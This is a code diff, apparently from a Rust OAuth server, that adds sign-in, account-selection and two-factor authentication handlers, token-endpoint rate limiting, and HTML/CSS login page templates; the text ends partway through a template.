client_id: request_data.parameters.client_id.clone(), 196 + client_name: None, 197 + scope: request_data.parameters.scope.clone(), 198 + redirect_uri: request_data.parameters.redirect_uri.clone(), 199 + state: request_data.parameters.state.clone(), 200 + login_hint: request_data.parameters.login_hint.clone(), 201 + }).into_response(); 202 + } 203 + 204 + let force_new_account = query.new_account.unwrap_or(false); 205 + 206 + if !force_new_account { 207 + if let Some(device_id) = extract_device_cookie(&headers) { 208 + if let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await { 209 + if !accounts.is_empty() { 210 + let device_accounts: Vec<DeviceAccount> = accounts 211 + .into_iter() 212 + .map(|row| DeviceAccount { 213 + did: row.did, 214 + handle: row.handle, 215 + email: row.email, 216 + last_used_at: row.last_used_at, 217 + }) 218 + .collect(); 219 + 220 + return Html(templates::account_selector_page( 221 + &request_data.parameters.client_id, 222 + None, 223 + &request_uri, 224 + &device_accounts, 225 + )).into_response(); 226 + } 227 + } 228 + } 229 + } 230 + 231 + Html(templates::login_page( 232 + &request_data.parameters.client_id, 233 + None, 234 + request_data.parameters.scope.as_deref(), 235 + &request_uri, 236 + None, 237 + request_data.parameters.login_hint.as_deref(), 238 + )).into_response() 239 + } 240 + 241 + pub async fn authorize_get_json( 242 + State(state): State<AppState>, 243 Query(query): Query<AuthorizeQuery>, 244 ) -> Result<Json<AuthorizeResponse>, OAuthError> { 245 let request_uri = query.request_uri.ok_or_else(|| { ··· 269 State(state): State<AppState>, 270 headers: HeaderMap, 271 Form(form): Form<AuthorizeSubmit>, 272 + ) -> Response { 273 + let json_response = wants_json(&headers); 274 + 275 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 276 + Ok(Some(data)) => data, 277 + Ok(None) => { 278 + if json_response { 279 + return ( 280 + axum::http::StatusCode::BAD_REQUEST, 281 + Json(serde_json::json!({ 282 + "error": "invalid_request", 283 + "error_description": "Invalid or expired request_uri." 284 + })), 285 + ).into_response(); 286 + } 287 + return Html(templates::error_page( 288 + "invalid_request", 289 + Some("Invalid or expired request_uri. Please start a new authorization request."), 290 + )).into_response(); 291 + } 292 + Err(e) => { 293 + if json_response { 294 + return ( 295 + axum::http::StatusCode::INTERNAL_SERVER_ERROR, 296 + Json(serde_json::json!({ 297 + "error": "server_error", 298 + "error_description": format!("Database error: {:?}", e) 299 + })), 300 + ).into_response(); 301 + } 302 + return Html(templates::error_page( 303 + "server_error", 304 + Some(&format!("Database error: {:?}", e)), 305 + )).into_response(); 306 + } 307 + }; 308 309 if request_data.expires_at < Utc::now() { 310 + let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 311 + if json_response { 312 + return ( 313 + axum::http::StatusCode::BAD_REQUEST, 314 + Json(serde_json::json!({ 315 + "error": "invalid_request", 316 + "error_description": "Authorization request has expired." 317 + })), 318 + ).into_response(); 319 + } 320 + return Html(templates::error_page( 321 + "invalid_request", 322 + Some("Authorization request has expired. Please start a new request."), 323 + )).into_response(); 324 } 325 326 + let show_login_error = |error_msg: &str, json: bool| -> Response { 327 + if json { 328 + return ( 329 + axum::http::StatusCode::FORBIDDEN, 330 + Json(serde_json::json!({ 331 + "error": "access_denied", 332 + "error_description": error_msg 333 + })), 334 + ).into_response(); 335 + } 336 + Html(templates::login_page( 337 + &request_data.parameters.client_id, 338 + None, 339 + request_data.parameters.scope.as_deref(), 340 + &form.request_uri, 341 + Some(error_msg), 342 + Some(&form.username), 343 + )).into_response() 344 + }; 345 + 346 + let user = match sqlx::query!( 347 r#" 348 + SELECT id, did, email, password_hash, two_factor_enabled, 349 + preferred_notification_channel as "preferred_notification_channel: NotificationChannel", 350 + deactivated_at, takedown_ref 351 FROM users 352 WHERE handle = $1 OR email = $1 353 "#, ··· 355 ) 356 .fetch_optional(&state.db) 357 .await 358 + { 359 + Ok(Some(u)) => u, 360 + Ok(None) => return show_login_error("Invalid handle/email or password.", json_response), 361 + Err(_) => return show_login_error("An error occurred. Please try again.", json_response), 362 + }; 363 364 if user.deactivated_at.is_some() { 365 + return show_login_error("This account has been deactivated.", json_response); 366 } 367 368 if user.takedown_ref.is_some() { 369 + return show_login_error("This account has been taken down.", json_response); 370 } 371 372 + let password_valid = match bcrypt::verify(&form.password, &user.password_hash) { 373 + Ok(valid) => valid, 374 + Err(_) => return show_login_error("An error occurred. Please try again.", json_response), 375 + }; 376 377 if !password_valid { 378 + return show_login_error("Invalid handle/email or password.", json_response); 379 + } 380 + 381 + if user.two_factor_enabled { 382 + let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; 383 + 384 + match db::create_2fa_challenge(&state.db, &user.did, &form.request_uri).await { 385 + Ok(challenge) => { 386 + let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 387 + if let Err(e) = enqueue_2fa_code( 388 + &state.db, 389 + user.id, 390 + &challenge.code, 391 + &hostname, 392 + ).await { 393 + tracing::warn!( 394 + did = %user.did, 395 + error = %e, 396 + "Failed to enqueue 2FA notification" 397 + ); 398 + } 399 + 400 + let channel_name = channel_display_name(user.preferred_notification_channel); 401 + let redirect_url = format!( 402 + "/oauth/authorize/2fa?request_uri={}&channel={}", 403 + url_encode(&form.request_uri), 404 + url_encode(channel_name) 405 + ); 406 + return Redirect::temporary(&redirect_url).into_response(); 407 + } 408 + Err(_) => { 409 + return show_login_error("An error occurred. Please try again.", json_response); 410 + } 411 + } 412 } 413 414 let code = Code::generate(); 415 + let mut device_id: Option<String> = extract_device_cookie(&headers); 416 + let mut new_cookie: Option<String> = None; 417 418 if form.remember_device { 419 + let final_device_id = if let Some(existing_id) = &device_id { 420 + existing_id.clone() 421 + } else { 422 + let new_id = DeviceId::generate(); 423 + let device_data = DeviceData { 424 + session_id: SessionId::generate().0, 425 + user_agent: extract_user_agent(&headers), 426 + ip_address: extract_client_ip(&headers), 427 + last_seen_at: Utc::now(), 428 + }; 429 + 430 + if db::create_device(&state.db, &new_id.0, &device_data).await.is_ok() { 431 + new_cookie = Some(make_device_cookie(&new_id.0)); 432 + device_id = Some(new_id.0.clone()); 433 + } 434 + new_id.0 435 }; 436 437 + let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await; 438 } 439 440 + if let Err(_) = db::update_authorization_request( 441 &state.db, 442 &form.request_uri, 443 &user.did, 444 device_id.as_deref(), 445 &code.0, 446 ) 447 + .await 448 + { 449 + return show_login_error("An error occurred. Please try again.", json_response); 450 + } 451 + 452 + let redirect_url = build_success_redirect( 453 + &request_data.parameters.redirect_uri, 454 + &code.0, 455 + request_data.parameters.state.as_deref(), 456 + ); 457 + 458 + let redirect = Redirect::temporary(&redirect_url); 459 + 460 + if let Some(cookie) = new_cookie { 461 + ([(SET_COOKIE, cookie)], redirect).into_response() 462 + } else { 463 + redirect.into_response() 464 + } 465 + } 466 + 467 + pub async fn authorize_select( 468 + State(state): State<AppState>, 469 + headers: HeaderMap, 470 + Form(form): Form<AuthorizeSelectSubmit>, 471 + ) -> Response { 472 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 473 + Ok(Some(data)) => data, 474 + Ok(None) => { 475 + return Html(templates::error_page( 476 + "invalid_request", 477 + Some("Invalid or expired request_uri. Please start a new authorization request."), 478 + )).into_response(); 479 + } 480 + Err(_) => { 481 + return Html(templates::error_page( 482 + "server_error", 483 + Some("An error occurred. Please try again."), 484 + )).into_response(); 485 + } 486 + }; 487 + 488 + if request_data.expires_at < Utc::now() { 489 + let _ = db::delete_authorization_request(&state.db, &form.request_uri).await; 490 + return Html(templates::error_page( 491 + "invalid_request", 492 + Some("Authorization request has expired. Please start a new request."), 493 + )).into_response(); 494 + } 495 + 496 + let device_id = match extract_device_cookie(&headers) { 497 + Some(id) => id, 498 + None => { 499 + return Html(templates::error_page( 500 + "invalid_request", 501 + Some("No device session found. Please sign in."), 502 + )).into_response(); 503 + } 504 + }; 505 506 + let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await { 507 + Ok(valid) => valid, 508 + Err(_) => { 509 + return Html(templates::error_page( 510 + "server_error", 511 + Some("An error occurred. Please try again."), 512 + )).into_response(); 513 + } 514 + }; 515 + 516 + if !account_valid { 517 + return Html(templates::error_page( 518 + "access_denied", 519 + Some("This account is not available on this device. Please sign in."), 520 + )).into_response(); 521 + } 522 + 523 + let user = match sqlx::query!( 524 + r#" 525 + SELECT id, two_factor_enabled, 526 + preferred_notification_channel as "preferred_notification_channel: NotificationChannel" 527 + FROM users 528 + WHERE did = $1 529 + "#, 530 + form.did 531 + ) 532 + .fetch_optional(&state.db) 533 + .await 534 + { 535 + Ok(Some(u)) => u, 536 + Ok(None) => { 537 + return Html(templates::error_page( 538 + "access_denied", 539 + Some("Account not found. Please sign in."), 540 + )).into_response(); 541 + } 542 + Err(_) => { 543 + return Html(templates::error_page( 544 + "server_error", 545 + Some("An error occurred. Please try again."), 546 + )).into_response(); 547 + } 548 + }; 549 + 550 + if user.two_factor_enabled { 551 + let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await; 552 + 553 + match db::create_2fa_challenge(&state.db, &form.did, &form.request_uri).await { 554 + Ok(challenge) => { 555 + let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 556 + if let Err(e) = enqueue_2fa_code( 557 + &state.db, 558 + user.id, 559 + &challenge.code, 560 + &hostname, 561 + ).await { 562 + tracing::warn!( 563 + did = %form.did, 564 + error = %e, 565 + "Failed to enqueue 2FA notification" 566 + ); 567 + } 568 + 569 + let channel_name = channel_display_name(user.preferred_notification_channel); 570 + let redirect_url = format!( 571 + "/oauth/authorize/2fa?request_uri={}&channel={}", 572 + url_encode(&form.request_uri), 573 + url_encode(channel_name) 574 + ); 575 + return Redirect::temporary(&redirect_url).into_response(); 576 + } 577 + Err(_) => { 578 + return Html(templates::error_page( 579 + "server_error", 580 + Some("An error occurred. Please try again."), 581 + )).into_response(); 582 + } 583 + } 584 + } 585 + 586 + let _ = db::upsert_account_device(&state.db, &form.did, &device_id).await; 587 + 588 + let code = Code::generate(); 589 + 590 + if let Err(_) = db::update_authorization_request( 591 + &state.db, 592 + &form.request_uri, 593 + &form.did, 594 + Some(&device_id), 595 + &code.0, 596 + ) 597 + .await 598 + { 599 + return Html(templates::error_page( 600 + "server_error", 601 + Some("An error occurred. Please try again."), 602 + )).into_response(); 603 + } 604 + 605 + let redirect_url = build_success_redirect( 606 + &request_data.parameters.redirect_uri, 607 + &code.0, 608 + request_data.parameters.state.as_deref(), 609 + ); 610 + 611 + Redirect::temporary(&redirect_url).into_response() 612 + } 613 + 614 + fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String { 615 let mut redirect_url = redirect_uri.to_string(); 616 617 let separator = if redirect_url.contains('?') { '&' } else { '?' }; 618 redirect_url.push(separator); 619 + redirect_url.push_str(&format!("code={}", url_encode(code))); 620 621 + if let Some(req_state) = state { 622 + redirect_url.push_str(&format!("&state={}", url_encode(req_state))); 623 } 624 625 let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 626 redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname)))); 627 628 + redirect_url 629 } 630 631 #[derive(Debug, Serialize)] ··· 663 pub struct AuthorizeDenyForm { 664 pub request_uri: String, 665 } 666 + 667 + #[derive(Debug, Deserialize)] 668 + pub struct Authorize2faQuery { 669 + pub request_uri: String, 670 + pub channel: Option<String>, 671 + } 672 + 673 + #[derive(Debug, Deserialize)] 674 + pub struct Authorize2faSubmit { 675 + pub request_uri: String, 676 + pub code: String, 677 + } 678 + 679 + const MAX_2FA_ATTEMPTS: i32 = 5; 680 + 681 + pub async fn authorize_2fa_get( 682 + State(state): State<AppState>, 683 + Query(query): Query<Authorize2faQuery>, 684 + ) -> Response { 685 + let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await { 686 + Ok(Some(c)) => c, 687 + Ok(None) => { 688 + return Html(templates::error_page( 689 + "invalid_request", 690 + Some("No 2FA challenge found. Please start over."), 691 + )).into_response(); 692 + } 693 + Err(_) => { 694 + return Html(templates::error_page( 695 + "server_error", 696 + Some("An error occurred. Please try again."), 697 + )).into_response(); 698 + } 699 + }; 700 + 701 + if challenge.expires_at < Utc::now() { 702 + let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 703 + return Html(templates::error_page( 704 + "invalid_request", 705 + Some("2FA code has expired. Please start over."), 706 + )).into_response(); 707 + } 708 + 709 + let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await { 710 + Ok(Some(d)) => d, 711 + Ok(None) => { 712 + return Html(templates::error_page( 713 + "invalid_request", 714 + Some("Authorization request not found. Please start over."), 715 + )).into_response(); 716 + } 717 + Err(_) => { 718 + return Html(templates::error_page( 719 + "server_error", 720 + Some("An error occurred. Please try again."), 721 + )).into_response(); 722 + } 723 + }; 724 + 725 + let channel = query.channel.as_deref().unwrap_or("email"); 726 + 727 + Html(templates::two_factor_page( 728 + &query.request_uri, 729 + channel, 730 + None, 731 + )).into_response() 732 + } 733 + 734 + pub async fn authorize_2fa_post( 735 + State(state): State<AppState>, 736 + headers: HeaderMap, 737 + Form(form): Form<Authorize2faSubmit>, 738 + ) -> Response { 739 + let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await { 740 + Ok(Some(c)) => c, 741 + Ok(None) => { 742 + return Html(templates::error_page( 743 + "invalid_request", 744 + Some("No 2FA challenge found. Please start over."), 745 + )).into_response(); 746 + } 747 + Err(_) => { 748 + return Html(templates::error_page( 749 + "server_error", 750 + Some("An error occurred. Please try again."), 751 + )).into_response(); 752 + } 753 + }; 754 + 755 + if challenge.expires_at < Utc::now() { 756 + let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 757 + return Html(templates::error_page( 758 + "invalid_request", 759 + Some("2FA code has expired. Please start over."), 760 + )).into_response(); 761 + } 762 + 763 + if challenge.attempts >= MAX_2FA_ATTEMPTS { 764 + let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 765 + return Html(templates::error_page( 766 + "access_denied", 767 + Some("Too many failed attempts. Please start over."), 768 + )).into_response(); 769 + } 770 + 771 + let code_valid: bool = form.code.trim().as_bytes().ct_eq(challenge.code.as_bytes()).into(); 772 + 773 + if !code_valid { 774 + let _ = db::increment_2fa_attempts(&state.db, challenge.id).await; 775 + 776 + let channel = match sqlx::query_scalar!( 777 + r#"SELECT preferred_notification_channel as "channel: NotificationChannel" FROM users WHERE did = $1"#, 778 + challenge.did 779 + ) 780 + .fetch_optional(&state.db) 781 + .await 782 + { 783 + Ok(Some(ch)) => channel_display_name(ch).to_string(), 784 + Ok(None) | Err(_) => "email".to_string(), 785 + }; 786 + 787 + let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 788 + Ok(Some(d)) => d, 789 + Ok(None) => { 790 + return Html(templates::error_page( 791 + "invalid_request", 792 + Some("Authorization request not found. Please start over."), 793 + )).into_response(); 794 + } 795 + Err(_) => { 796 + return Html(templates::error_page( 797 + "server_error", 798 + Some("An error occurred. Please try again."), 799 + )).into_response(); 800 + } 801 + }; 802 + 803 + return Html(templates::two_factor_page( 804 + &form.request_uri, 805 + &channel, 806 + Some("Invalid verification code. Please try again."), 807 + )).into_response(); 808 + } 809 + 810 + let _ = db::delete_2fa_challenge(&state.db, challenge.id).await; 811 + 812 + let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await { 813 + Ok(Some(d)) => d, 814 + Ok(None) => { 815 + return Html(templates::error_page( 816 + "invalid_request", 817 + Some("Authorization request not found."), 818 + )).into_response(); 819 + } 820 + Err(_) => { 821 + return Html(templates::error_page( 822 + "server_error", 823 + Some("An error occurred."), 824 + )).into_response(); 825 + } 826 + }; 827 + 828 + let code = Code::generate(); 829 + let device_id = extract_device_cookie(&headers); 830 + 831 + if let Err(_) = db::update_authorization_request( 832 + &state.db, 833 + &form.request_uri, 834 + &challenge.did, 835 + device_id.as_deref(), 836 + &code.0, 837 + ) 838 + .await 839 + { 840 + return Html(templates::error_page( 841 + "server_error", 842 + Some("An error occurred. Please try again."), 843 + )).into_response(); 844 + } 845 + 846 + let redirect_url = build_success_redirect( 847 + &request_data.parameters.redirect_uri, 848 + &code.0, 849 + request_data.parameters.state.as_deref(), 850 + ); 851 + 852 + Redirect::temporary(&redirect_url).into_response() 853 + }
+1 -1
src/oauth/endpoints/token/grants.rs
··· 54 .get(&auth_request.client_id) 55 .await?; 56 let client_auth = auth_request.client_auth.clone().unwrap_or(ClientAuth::None); 57 - verify_client_auth(&client_metadata, &client_auth)?; 58 59 verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?; 60
··· 54 .get(&auth_request.client_id) 55 .await?; 56 let client_auth = auth_request.client_auth.clone().unwrap_or(ClientAuth::None); 57 + verify_client_auth(&client_metadata_cache, &client_metadata, &client_auth).await?; 58 59 verify_pkce(&auth_request.parameters.code_challenge, &code_verifier)?; 60
+24
src/oauth/endpoints/token/mod.rs
··· 19 }; 20 pub use types::{TokenRequest, TokenResponse}; 21 22 pub async fn token_endpoint( 23 State(state): State<AppState>, 24 headers: HeaderMap, 25 Form(request): Form<TokenRequest>, 26 ) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> { 27 let dpop_proof = headers 28 .get("DPoP") 29 .and_then(|v| v.to_str().ok())
··· 19 }; 20 pub use types::{TokenRequest, TokenResponse}; 21 22 + fn extract_client_ip(headers: &HeaderMap) -> String { 23 + if let Some(forwarded) = headers.get("x-forwarded-for") { 24 + if let Ok(value) = forwarded.to_str() { 25 + if let Some(first_ip) = value.split(',').next() { 26 + return first_ip.trim().to_string(); 27 + } 28 + } 29 + } 30 + if let Some(real_ip) = headers.get("x-real-ip") { 31 + if let Ok(value) = real_ip.to_str() { 32 + return value.trim().to_string(); 33 + } 34 + } 35 + "unknown".to_string() 36 + } 37 + 38 pub async fn token_endpoint( 39 State(state): State<AppState>, 40 headers: HeaderMap, 41 Form(request): Form<TokenRequest>, 42 ) -> Result<(HeaderMap, Json<TokenResponse>), OAuthError> { 43 + let client_ip = extract_client_ip(&headers); 44 + if state.rate_limiters.oauth_token.check_key(&client_ip).is_err() { 45 + tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded"); 46 + return Err(OAuthError::InvalidRequest( 47 + "Too many requests. Please try again later.".to_string(), 48 + )); 49 + } 50 + 51 let dpop_proof = headers 52 .get("DPoP") 53 .and_then(|v| v.to_str().ok())
+2
src/oauth/mod.rs
··· 5 pub mod client; 6 pub mod endpoints; 7 pub mod error; 8 pub mod verify; 9 10 pub use types::*; 11 pub use error::OAuthError; 12 pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError};
··· 5 pub mod client; 6 pub mod endpoints; 7 pub mod error; 8 + pub mod templates; 9 pub mod verify; 10 11 pub use types::*; 12 pub use error::OAuthError; 13 pub use verify::{verify_oauth_access_token, generate_dpop_nonce, VerifyResult, OAuthUser, OAuthAuthError}; 14 + pub use templates::{DeviceAccount, mask_email};
+719
src/oauth/templates.rs
···
··· 1 + use chrono::{DateTime, Utc}; 2 + 3 + fn base_styles() -> &'static str { 4 + r#" 5 + :root { 6 + --primary: #0085ff; 7 + --primary-hover: #0077e6; 8 + --primary-contrast: #ffffff; 9 + --primary-100: #dbeafe; 10 + --primary-400: #60a5fa; 11 + --primary-600-30: rgba(37, 99, 235, 0.3); 12 + --contrast-0: #ffffff; 13 + --contrast-25: #f8f9fa; 14 + --contrast-50: #f1f3f5; 15 + --contrast-100: #e9ecef; 16 + --contrast-200: #dee2e6; 17 + --contrast-300: #ced4da; 18 + --contrast-400: #adb5bd; 19 + --contrast-500: #6b7280; 20 + --contrast-600: #4b5563; 21 + --contrast-700: #374151; 22 + --contrast-800: #1f2937; 23 + --contrast-900: #111827; 24 + --error: #dc2626; 25 + --error-bg: #fef2f2; 26 + --success: #059669; 27 + --success-bg: #ecfdf5; 28 + } 29 + 30 + @media (prefers-color-scheme: dark) { 31 + :root { 32 + --contrast-0: #111827; 33 + --contrast-25: #1f2937; 34 + --contrast-50: #374151; 35 + --contrast-100: #4b5563; 36 + --contrast-200: #6b7280; 37 + --contrast-300: #9ca3af; 38 + --contrast-400: #d1d5db; 39 + --contrast-500: #e5e7eb; 40 + --contrast-600: #f3f4f6; 41 + --contrast-700: #f9fafb; 42 + --contrast-800: #ffffff; 43 + --contrast-900: #ffffff; 44 + --error-bg: #451a1a; 45 + --success-bg: #064e3b; 46 + } 47 + } 48 + 49 + * { 50 + box-sizing: border-box; 51 + margin: 0; 52 + padding: 0; 53 + } 54 + 55 + body { 56 + font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; 57 + background: var(--contrast-50); 58 + color: var(--contrast-900); 59 + min-height: 100vh; 60 + display: flex; 61 + align-items: center; 62 + justify-content: center; 63 + padding: 1rem; 64 + line-height: 1.5; 65 + } 66 + 67 + .container { 68 + width: 100%; 69 + max-width: 400px; 70 + padding-top: 15vh; 71 + } 72 + 73 + @media (max-width: 640px) { 74 + .container { 75 + padding-top: 2rem; 76 + } 77 + } 78 + 79 + .card { 80 + background: var(--contrast-0); 81 + border: 1px solid var(--contrast-100); 82 + border-radius: 0.75rem; 83 + padding: 1.5rem; 84 + box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.1), 0 8px 10px -6px rgba(0, 0, 0, 0.1); 85 + } 86 + 87 + @media (prefers-color-scheme: dark) { 88 + .card { 89 + box-shadow: 0 20px 25px -5px rgba(0, 0, 0, 0.4), 0 8px 10px -6px rgba(0, 0, 0, 0.3); 90 + } 91 + } 92 + 93 + h1 { 94 + font-size: 1.5rem; 95 + font-weight: 600; 96 + color: var(--contrast-900); 97 + margin-bottom: 0.5rem; 98 + } 99 + 100 + .subtitle { 101 + color: var(--contrast-500); 102 + font-size: 0.875rem; 103 + margin-bottom: 1.5rem; 104 + } 105 + 106 + .subtitle strong { 107 + color: var(--contrast-700); 108 + } 109 + 110 + .client-info { 111 + background: var(--contrast-25); 112 + border-radius: 0.5rem; 113 + padding: 1rem; 114 + margin-bottom: 1.5rem; 115 + } 116 + 117 + .client-info .client-name { 118 + font-weight: 500; 119 + color: var(--contrast-900); 120 + display: block; 121 + margin-bottom: 0.25rem; 122 + } 123 + 124 + .client-info .scope { 125 + color: var(--contrast-500); 126 + font-size: 0.875rem; 127 + } 128 + 129 + .error-banner { 130 + background: var(--error-bg); 131 + color: var(--error); 132 + border-radius: 0.5rem; 133 + padding: 0.75rem 1rem; 134 + margin-bottom: 1rem; 135 + font-size: 0.875rem; 136 + } 137 + 138 + .form-group { 139 + margin-bottom: 1.25rem; 140 + } 141 + 142 + label { 143 + display: block; 144 + font-size: 0.875rem; 145 + font-weight: 500; 146 + color: var(--contrast-700); 147 + margin-bottom: 0.375rem; 148 + } 149 + 150 + input[type="text"], 151 + input[type="email"], 152 + input[type="password"] { 153 + width: 100%; 154 + padding: 0.625rem 0.875rem; 155 + border: 2px solid var(--contrast-200); 156 + border-radius: 0.375rem; 157 + font-size: 1rem; 158 + color: var(--contrast-900); 159 + background: var(--contrast-0); 160 + transition: border-color 0.15s, box-shadow 0.15s; 161 + } 162 + 163 + input[type="text"]:focus, 164 + input[type="email"]:focus, 165 + input[type="password"]:focus { 166 + outline: none; 167 + border-color: var(--primary); 168 + box-shadow: 0 0 0 3px var(--primary-600-30); 169 + } 170 + 171 + input[type="text"]::placeholder, 172 + input[type="email"]::placeholder, 173 + input[type="password"]::placeholder { 174 + color: var(--contrast-400); 175 + } 176 + 177 + .checkbox-group { 178 + display: flex; 179 + align-items: center; 180 + gap: 0.5rem; 181 + margin-bottom: 1.5rem; 182 + } 183 + 184 + .checkbox-group input[type="checkbox"] { 185 + width: 1.125rem; 186 + height: 1.125rem; 187 + accent-color: var(--primary); 188 + } 189 + 190 + .checkbox-group label { 191 + margin-bottom: 0; 192 + font-weight: normal; 193 + color: var(--contrast-600); 194 + cursor: pointer; 195 + } 196 + 197 + .buttons { 198 + display: flex; 199 + gap: 0.75rem; 200 + } 201 + 202 + .btn { 203 + flex: 1; 204 + padding: 0.625rem 1.25rem; 205 + border-radius: 0.375rem; 206 + font-size: 1rem; 207 + font-weight: 500; 208 + cursor: pointer; 209 + transition: background-color 0.15s, transform 0.1s; 210 + border: none; 211 + text-align: center; 212 + text-decoration: none; 213 + display: inline-flex; 214 + align-items: center; 215 + justify-content: center; 216 + } 217 + 218 + .btn:active { 219 + transform: scale(0.98); 220 + } 221 + 222 + .btn-primary { 223 + background: var(--primary); 224 + color: var(--primary-contrast); 225 + } 226 + 227 + .btn-primary:hover { 228 + background: var(--primary-hover); 229 + } 230 + 231 + .btn-primary:disabled { 232 + background: var(--primary-400); 233 + cursor: not-allowed; 234 + } 235 + 236 + .btn-secondary { 237 + background: var(--contrast-500); 238 + color: white; 239 + } 240 + 241 + .btn-secondary:hover { 242 + background: var(--contrast-600); 243 + } 244 + 245 + .footer { 246 + text-align: center; 247 + margin-top: 1.5rem; 248 + font-size: 0.75rem; 249 + color: var(--contrast-400); 250 + } 251 + 252 + .accounts { 253 + display: flex; 254 + flex-direction: column; 255 + gap: 0.5rem; 256 + margin-bottom: 1rem; 257 + } 258 + 259 + .account-item { 260 + display: flex; 261 + align-items: center; 262 + gap: 0.75rem; 263 + width: 100%; 264 + padding: 0.75rem; 265 + background: var(--contrast-25); 266 + border: 1px solid var(--contrast-100); 267 + border-radius: 0.5rem; 268 + cursor: pointer; 269 + transition: background-color 0.15s, border-color 0.15s; 270 + text-align: left; 271 + } 272 + 273 + .account-item:hover { 274 + background: var(--contrast-50); 275 + border-color: var(--contrast-200); 276 + } 277 + 278 + .avatar { 279 + width: 2.5rem; 280 + height: 2.5rem; 281 + border-radius: 50%; 282 + background: var(--primary); 283 + color: var(--primary-contrast); 284 + display: flex; 285 + align-items: center; 286 + justify-content: center; 287 + font-weight: 600; 288 + font-size: 0.875rem; 289 + flex-shrink: 0; 290 + } 291 + 292 + .account-info { 293 + flex: 1; 294 + min-width: 0; 295 + } 296 + 297 + .account-info .handle { 298 + display: block; 299 + font-weight: 500; 300 + color: var(--contrast-900); 301 + overflow: hidden; 302 + text-overflow: ellipsis; 303 + white-space: nowrap; 304 + } 305 + 306 + .account-info .email { 307 + display: block; 308 + font-size: 0.875rem; 309 + color: var(--contrast-500); 310 + overflow: hidden; 311 + text-overflow: ellipsis; 312 + white-space: nowrap; 313 + } 314 + 315 + .chevron { 316 + color: var(--contrast-400); 317 + font-size: 1.25rem; 318 + flex-shrink: 0; 319 + } 320 + 321 + .divider { 322 + height: 1px; 323 + background: var(--contrast-100); 324 + margin: 1rem 0; 325 + } 326 + 327 + .link-button { 328 + background: none; 329 + border: none; 330 + color: var(--primary); 331 + cursor: pointer; 332 + font-size: inherit; 333 + padding: 0; 334 + text-decoration: underline; 335 + } 336 + 337 + .link-button:hover { 338 + color: var(--primary-hover); 339 + } 340 + 341 + .new-account-link { 342 + display: block; 343 + text-align: center; 344 + color: var(--primary); 345 + text-decoration: none; 346 + font-size: 0.875rem; 347 + } 348 + 349 + .new-account-link:hover { 350 + text-decoration: underline; 351 + } 352 + 353 + .help-text { 354 + text-align: center; 355 + margin-top: 1rem; 356 + font-size: 0.875rem; 357 + color: var(--contrast-500); 358 + } 359 + 360 + .icon { 361 + font-size: 3rem; 362 + margin-bottom: 1rem; 363 + } 364 + 365 + .error-code { 366 + background: var(--error-bg); 367 + color: var(--error); 368 + padding: 0.5rem 1rem; 369 + border-radius: 0.375rem; 370 + font-family: monospace; 371 + display: inline-block; 372 + margin-bottom: 1rem; 373 + } 374 + 375 + .success-icon { 376 + width: 3rem; 377 + height: 3rem; 378 + border-radius: 50%; 379 + background: var(--success-bg); 380 + color: var(--success); 381 + display: flex; 382 + align-items: center; 383 + justify-content: center; 384 + font-size: 1.5rem; 385 + margin: 0 auto 1rem; 386 + } 387 + 388 + .text-center { 389 + text-align: center; 390 + } 391 + 392 + .code-input { 393 + letter-spacing: 0.5em; 394 + text-align: center; 395 + font-size: 1.5rem; 396 + font-family: monospace; 397 + } 398 + "# 399 + } 400 + 401 + pub fn login_page( 402 + client_id: &str, 403 + client_name: Option<&str>, 404 + scope: Option<&str>, 405 + request_uri: &str, 406 + error_message: Option<&str>, 407 + login_hint: Option<&str>, 408 + ) -> String { 409 + let client_display = client_name.unwrap_or(client_id); 410 + let scope_display = scope.unwrap_or("access your account"); 411 + 412 + let error_html = error_message 413 + .map(|msg| format!(r#"<div class="error-banner">{}</div>"#, html_escape(msg))) 414 + .unwrap_or_default(); 415 + 416 + let login_hint_value = login_hint.unwrap_or(""); 417 + 418 + format!( 419 + r#"<!DOCTYPE html> 420 + <html lang="en"> 421 + <head> 422 + <meta charset="UTF-8"> 423 + <meta name="viewport" content="width=device-width, initial-scale=1.0"> 424 + <meta name="robots" content="noindex"> 425 + <title>Sign in</title> 426 + <style>{styles}</style> 427 + </head> 428 + <body> 429 + <div class="container"> 430 + <div class="card"> 431 + <h1>Sign in</h1> 432 + <p class="subtitle">to continue to <strong>{client_display}</strong></p> 433 + 434 + <div class="client-info"> 435 + <span class="client-name">{client_display}</span> 436 + <span class="scope">wants to {scope_display}</span> 437 + </div> 438 + 439 + {error_html} 440 + 441 + <form method="POST" action="/oauth/authorize"> 442 + <input type="hidden" name="request_uri" value="{request_uri}"> 443 + 444 + <div class="form-group"> 445 + <label for="username">Handle or Email</label> 446 + <input type="text" id="username" name="username" value="{login_hint_value}" 447 + required autocomplete="username" autofocus 448 + placeholder="you@example.com"> 449 + </div> 450 + 451 + <div class="form-group"> 452 + <label for="password">Password</label> 453 + <input type="password" id="password" name="password" required 454 + autocomplete="current-password" 